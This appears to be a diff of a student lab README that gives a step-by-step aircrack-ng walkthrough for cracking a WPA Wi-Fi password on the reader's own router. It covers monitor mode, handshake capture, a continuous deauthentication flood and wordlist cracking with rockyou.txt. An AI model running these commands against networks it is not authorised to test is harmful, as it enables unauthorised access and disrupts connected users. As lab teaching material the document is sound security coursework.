rzoubek44/R-2_Repo_Fall_2025/README.md

 sudo apt install aircrack-ng

+Have a wordlist of your choice ready to use.
+I will be using the rockyou.txt wordlist.
+Unzip the file if not already.

+sudo gunzip /usr/share/wordlists/rockyou.txt.gz

 # Adapter set up

 To set up, plug in the Wi-Fi adapter into your USB port.
 Open virtual box and go to settings on the Kali Linux VM.
 Make sure the check enable USB controller and USB 2.0 (OHCI + EHCI) controller.
 Click on the green check mark and add "Ralink 802.11 n WLAN".
 Once logged in on the VM, unplug the adapter and plug it back in.
 Run "ip addr" and you should a new interface for the adapter.

 # Execution

-See what network interfaces are on the Kali machine
+See what network interfaces are on the Kali machine.
+You should see wlan0 for your adapter.

 ip addr

-Kill any processes that could interfere with Wi-Fi adapter
+Kill any processes that could interfere with Wi-Fi adapter with monitoring mode.

 sudo airmon-ng check kill

-Start the Wi-Fi adapter interface in monitor mode
+Start the Wi-Fi adapter interface in monitor mode.
+Your interface should change from wlan0 to wlan0mon.

 sudo airmon-ng start wlan0

-Verify that monitor mode is running on wlan0
+Verify that monitor mode is running on wlan0.

 sudo airmon-ng

-See all nearby available networks and get the routers's MAC address and channel
+See all nearby available networks and get the routers's MAC address and channel.
+Once your target is found and got the BSSID and Channel number, press "Ctrl+c" to stop.

 sudo airodump-ng wlan0mon

-Test to see device connectivity with the router by authenticating to it using your phone or another device
+Test to see device connectivity with the router by authenticating to it using your phone or another device.

 sudo airodump-ng wlan0mon -d 60:83:E7:0B:47:62

 1st terminal, replace the channel number and BSSID with your own Router's info.
-Replace hack1 with your desired file name for the capture
+Replace hack1 with your desired file name for the capture.
+Focus the adapter on your target and capture the 4-way handshake. -c is the channel, --bssid is the MAC address of the target router, -w is the option to output the file to save the handshake.

 sudo airodump-ng -w hack1 -c 3 --bssid 60:83:E7:0B:47:62 wlan0mon

-2nd terminal, replace the BSSID with your own Router's
+2nd terminal, replace the BSSID with your own Router's.
+This forces devices to disconnect to the router.
+When they reconnect, the handhsake is captured.
+In the 1st terminal, when a device authenticates, you should see, "WPA Handshale: [BSSID]" appear in the upper right hand corner.

 sudo aireplay-ng --deauth 0 -a 60:83:E7:0B:47:62 wlan0mon

-Use Wireshark to open the captured file
+Use Wireshark to open the captured file.
+In message 2, you should the devices unique signature, MIC, in the packet.
+This is needed to crack the password.

 wireshark hack1-01.cap

-Stop monitor mode for the wlan0 interface
+Stop monitor mode for the wlan0 interface.

 airmon-ng stop wlan0mon

 Crack the file with rockyou.txt.
-Replace hack1-01.cap with your file name
+Replace hack1-01.cap with your file name.
+If the password is in the wordlist, the output should say, "KEY FOUND! [ The cracked password ]".

 aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt